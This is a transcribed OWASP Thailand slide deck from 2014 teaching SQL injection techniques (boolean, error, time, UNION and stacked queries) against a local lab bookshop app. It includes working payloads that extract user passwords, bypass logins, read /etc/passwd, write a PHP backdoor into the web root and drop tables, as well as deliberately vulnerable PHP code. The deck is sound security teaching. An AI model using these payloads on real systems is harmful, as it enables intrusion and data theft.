Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto

14,649 views

Published on

Topic: SQL Injection 101 : It is not just about ' or '1'='1
Speaker: Pichaya Morimoto
Event: OWASP Thailand Meeting 3/2014
Date: Auguest 28, 2014

Published in: Software
  • Hello! Get Your Professional Job-Winning Resume Here - Check our website! https://vk.cc/818RFv
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • hello. thanks, we're waiting for more gr8 shares. regards
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto

  1. 1. SQL Injection 101 It is not just about ' or '1'='1 pichaya@ieee.org fb.com/index.htmli linkedin.com/in/pich4ya Pichaya Morimoto
  2. 2. Legal Warning พระราชบัญญัติ ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. ๒๕๕๐ มาตรา 5 ผู้ใดเข้าถึงโดยมิชอบซึ่งระบบคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะและมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 6 เดือน หรือปรับไม่เกิน 10,000 บาท มาตรา 7 ผู้ใดเข้าถึงโดยมิชอบซึ่งข้อมูลคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะ และมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 2 ปี หรือปรับไม่เกิน 40,000 บาท มาตรา 9 ผู้ใดทำให้เสียหาย ทำลาย แก้ไข เปลี่ยนแปลง หรือเพิ่มเติมไม่ว่าทั้งหมดหรือ บางส่วน ซึ่งข้อมูลคอมพิวเตอร์ของผู้อื่นโดยมิชอบ โทษจำคุกไม่เกิน 5 ปี หรือปรับไม่เกิน 100,000 บาท
  3. 3. Overview ★ Anatomy of SQL Injection Attack ★ Injection Techniques ○ B-E-T-U-S ★ Privilege Escalation ○ File & RCE ★ Advanced Attacks ★ Case Studies
  4. 4. What is SQL Injection “A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.” - https://www.owasp.org/index.php/SQL_Injection Web Application User inject a specially crafted SQL as input to manipulate results Application Users via client programs Input Entry Points (Search box, Forms, Article ID, Session ID, HTTP headers etc.) Database
  5. 5. Very Popular among Hackers
  6. 6. Impact on SQL Injection In general, consider SQL Injection a high impact severity. Technical Impacts Business Impacts ★ Data losses ★ Bypass Authentications ★ Denial of access ★ Lead to host takeover ★ All data could be stolen, modified, or deleted. ★ Could your reputation be harmed? * https://www.owasp.org/index.php/Top_10_2013-A1-Injection * https://www.owasp.org/index.php/SQL_Injection
  7. 7. Exploitation Complexity 95% 4% 1% Very Hard Lunatic Easy (Required an Expert) (Maze queries, 2nd order, Blind, Complex App Logic, Bypass Filters/WAF etc.) SQL injection with Havij by 3 year old
  8. 8. A Ton of Tools ★ Automated SQL injection Tools SQLMap, Havij, BBQSQL, SQLNinja, SQLiX, BobCat, bSQLHacker, bSQLbf, Absinthe, SQLBrute, Squeeza, SQL Power Injector etc. ★ Web Vulnerability Scanner ○ Commercial Acunetix, Netsparker, IBM AppScan,HP Fortify, HP WebInspect, BurpSuite Pro, Qualys WAS etc. ○ Free W3af, Nikto, SkipFish, Vega, OWASP ZAP etc.
  9. 9. Tool == Super Easy ?
  10. 10. Tool == Super Easy ?
  11. 11. Tools there, why learn to SQLi? 1. When tools failed to exploit? 2. False Positive ★ Complex Database Query ★ Complex Application Logic ★ Encodings & Blacklist Filters ★ Post Authen-ed ★ Anti-CSRF Token ★ Non-SELECT statements ★ Programmer is so indy 3. It’s just fun, and sometimes can make good money... In case you are penetration tester, or just a Zero-day hunter ;) Popular websites already scanned by those available tools. It is very challenge, if you can find flaws that overlooked by tools.
  12. 12. Quote from a Hacker “แฮกเกอร์ที่เก่งไม่ใช่แฮกเกอร์ที่ แฮกเว็บได้ 1,000 เว็บ แต่เป็น แฮกเกอร์ที่แฮกเว็บเดิมได้ 1,000 ครั้ง โดยที่โดน แพทช์ไปแล้วทุกครั้ง” ตาเล็ก Windows98SE
  13. 13. SQL Injection Techniques 1. Boolean-based blind 2. Error-based 3. Time-based blind 4. UNION query-based 5. Stacked queries
  14. 14. Boolean-based blind technique ★ Inject SQL string to control result to be TRUE or FALSE using boolean algebra ★ You can determine whether T/F based on analysis of HTTP responses (string/regex/page length/HTTP status) ★ Retrieve arbitrary data: ○ Sub-Queries with “SELECT” + Conditions (CASE-WHEN, IF-THEN)
  15. 15. Example of Vulnerable Code User Input TITLE insert into SQL query TRUE case : title = naruto FALSE case : title = abc123
  16. 16. Boolean-based blind : Probe ★ title = naruto SQL : SELECT * FROM bookshop WHERE title='naruto' Result : found (TRUE) ★ title = abc123 SQL : SELECT * FROM bookshop WHERE title='abc123' Result : not found (FALSE) ★ title = naruto' and '1'='1 SQL : ..WHERE title='naruto' and '1'='1' Result : found (TRUE) ★ title = naruto' and 1=2-- - SQL : ..WHERE title='naruto' and 1=2-- -' Result : found (FALSE) Insert another TRUE condition connected with ‘AND’ operator MySQL comments -- - # /**/ T & T = T T & F = F
  17. 17. Boolean-based blind : Exploit ★ title=naruto' and 'cat'=(if(3>2,'cat','dog'))-- - Result: found (TRUE) ★ title=naruto' and 'cat'=(if(1>5,'cat','dog'))-- - Result: not found (FALSE) ★ title=naruto' and 'cat'= (if(database()='owasp_db','cat','dog'))-- - Result: found (TRUE) ★ title=naruto' and 'cat'= (if(mid(database(),1,1)='a','cat','dog'))-- - Result: not found (not starts with ‘a’) … b … c ... ★ title=naruto' and 'cat'= (if(mid(database(),1,1)='o','cat','dog'))-- - MySQL IF function IF( <condition>, <return when TRUE>, <return when FALSE> ) MySQL substring functions 1. SUBSTRING (str, pos, len) 2. SUBSTR (str, pos, len) 3. MID(str, pos, len) Result: found (starts with ‘o’), then go to next character.
  18. 18. Example of Vulnerable Code $email=$_POST['email']; $password=$_POST['password']; $sql="SELECT * FROM users WHERE (email='$email')"; $sql.=" AND (password='$password')"; $result = mysql_query($sql); if(mysql_num_rows($result)){ die(header('location: member.php')); }else{ die(header('HTTP/1.0 401 Unauthorized')); } True (Login successful) HTTP/1.1 302 Found location: member.php False (Login failed) HTTP/1.0 401 Unauthorized Unvalidated User Input Exploit: curl -v http://url/login.php -d "email=a&password=')||(2>'1" … WHERE (email='a') AND (password='')||(2>'1') Always TRUE
  19. 19. Boolean-based blind : Exploit password=1' or 2>(if(mid((select password from users),1,1)='a',1,3))-- - HTTP/1.0 401 Unauthorized Char Pos : 1 password=1' or from first record of password column 2>(if(mid((select password from users),1,1)='b',1,3))-- - HTTP/1.0 401 Unauthorized ... password=1' or 2>(if(mid((select password from users),1,1)='t',1,3))-- - HTTP/1.1 302 Found location: member.php If Char Pos 1 equals to ‘a’ then return 1, otherwise return 3 When result is in TRUE case that means 1st char is current value ( ‘t’ )
  20. 20. Boolean-based blind : Exploit password=1' or 2>(if(mid((select password from users),2,1)='a',1,3))-- - HTTP/1.0 401 Unauthorized Go To next Repeat steps until you character get all text from the results! Tip: Find length(<query>)
  21. 21. Boolean-based blind : Exploit Look for automate way ? if the flaw is not too complicate then we can just switch to SQLMap. But keep in mind, there are A LOT of tricky patterns that tools cannot figure out how to evaluate as TRUE or FALSE, so just write your own script! Faster blind test algorithms: ★ Bisection algorithm (binary search) ★ Bit-shift algorithm ★ Regular Expression search
  22. 22. Error-based : Concept ★ Inject specially crafted invalid SQL syntax ★ Ideally, force web application to expose Error Message which contains the injection results ★ Methods depend solely on DBMS ★ Rarely found in production webapps
  23. 23. Example of Vulnerable Code function search_book($title){ global $con; $sql = "SELECT * FROM bookshop WHERE title='".$title."'"; $result = mysql_query($sql) or die(mysql_error($con)); if(mysql_num_rows($result)){ return 'found'; }else{ return 'not found'; } Show Database Error Message when query result in an error } $book_title = $_GET['title']; $book_status = search_book($book_title); echo '<h1>Result: '.$book_status.'</h1>';
  24. 24. Error-based : Exploit http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat(user(),database())) ))-- -
  25. 25. Error-based : Exploit http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat_ws(0x3a,email,password) from users limit 2,1) ))-- - Caution Error messages has limit number of allowed length, so what? length() + mid() ;)
  26. 26. Time-based blind : Concept ★ Inject valid SQL string to ○ wait for few seconds in TRUE conditions and … ○ longer/shorter delay for FALSE ★ Analysis on response time to determine the result of queries ★ Take long time to get result but very useful to hack completely blind flaws
  27. 27. Example of Vulnerable Code
  28. 28. Time-based blind : Exploit newbook.php?title=aaa&author=bbb'+ if(ord(mid((select version()),12,1))>108,sleep(5),sleep(10)))--+- SQL: INSERT INTO bookshop(title,author) values ('aaa','bbb'+if(ord(mid((select version()),12,1)) >108,sleep(5),sleep(10)))-- -') TRUE case : sleep(5) , delay 5 seconds FALSE case : sleep(10), delay 10 seconds Delay 5 seconds
  29. 29. Time-based blind : Exploit Write a script to automate the attack ! For example, http://www.blackhatlibrary.net/SQL_injection/mysqli-blindutils/sqli-slee.py
  30. 30. Time-based blind : Exploit sleep() executed !
  31. 31. UNION query-based : Concept ★ Most popular method found in SQL injection tutorials from Google/YouTube ★ Inject valid SQL string by making the left-side SELECT to be false and then insert “UNION” with another right-side SELECT query using same number of columns contain what you want to fetch.
  32. 32. Example of Vulnerable Code Unvalidated parameter ‘author’ pass into SQL query
  33. 33. UNION query-based : Exploit Step 1 : Find columns of left SELECT statement using ‘ORDER BY’ http://owasp-sqli.local/showbook.php?author=longcat' order by 1-- - There are column no. 1 - 4 in underlying SELECT query There is no 5th column. If db error msg on, u will see: Unknown column '5' in 'order clause'
  34. 34. UNION query-based : Exploit Step 2.1 : We do not need result from 1st SELECT SQL query so discard it with ‘always FALSE’ condition. http://owasp-sqli.local/showbook.php?author=longcat' and 1>2-- - Step 2.2 : Insert 2nd SELECT SQL query separated by UNION http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 UNION select 1,2,3,4-- - Result of “SELECT 1,2,3,4” will replace where the result of 1st SELECT was.
  35. 35. UNION query-based : Exploit Exploit : http://owasp-sqli. local/showbook.php ?author=longcat' and 1>2 union select user(),database(),version(), (select group_concat(email, password) from users)--+- Tips: Database Meta Data select database() select table_name from information_schema.tables select column_name from information_schema.columns
  36. 36. Stacked Queries : Concept ★ Append another query into the injection ★ Not All DBMS drivers/API support stacked queries ★ Very Effective for MS-SQL, SQLite Attack Scenario: User Input = 123 SQL: SELECT email FROM users where id=123 User Input = 456; DROP table users SQL: ... users where id=456; DROP table users
  37. 37. Example of Vulnerable Code
  38. 38. Stacked queries : Exploit
  39. 39. Privilege Escalation ★ Read credential from configuration files ★ Create Accessible Web Backdoor ★ Arbitrary OS command execution
  40. 40. SQL Injection : Read File Exploit: http://owasp-sqli.local/showbook.php ?author=longcat' and 1>2 union select 1,load_file('/etc/passwd'),3,4--+-
  41. 41. SQL Injection : Write File Exploit: http://owasp-sqli.local/showbook.php ?author=longcat' and 1>2 union select 0x3c3f70687020706870696e666f28293b203f3e,null,null,null into outfile '/var/www/owasp-sqli.local/public_html/upload/info.php'--+-
  42. 42. SQL Injection : OS CMD Shell 1. Write File > Web Backdoor ( ex. http://youtube.com/watch?v=QIXTPPBfLyI ) 2. Built-in OS command functions / UDF MS-SQL xp_cmdshell
  43. 43. Advanced Attacks ★ MySQL Second Order SQL Injection ★ Abusing PHP PDO prepared statements ★ Making a Backdoor with SQLite ★ How a hashed string causes SQL Injection flaw ★ Account Takeover with SQL Truncation Attack ★ CodeIgniter Active Record Bypass
  44. 44. Next Time :s
  45. 45. Thanks! Need More? Good Resources https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005) https://www.owasp.org/index.php/Blind_SQL_Injection http://websec.ca/kb/sql_injection https://github.com/sqlmapproject/sqlmap http://www.amazon.com/Injection-Attacks-Defense-Second-Edition/dp/1597499633 Build your own SQL Injection Playground https://github.com/SpiderLabs/MCIR/tree/master/sqlol https://github.com/Audi-1/sqli-labs https://github.com/sqlmapproject/testenv https://www.owasp.org/index. php/OWASP_Broken_Web_Applications_Project https://pentesterlab.com/exercises/web_for_pentester/ https://pentesterlab.com/exercises/from_sqli_to_shell_II/ https://pentesterlab. com/exercises/from_sqli_to_shell_pg_edition/

×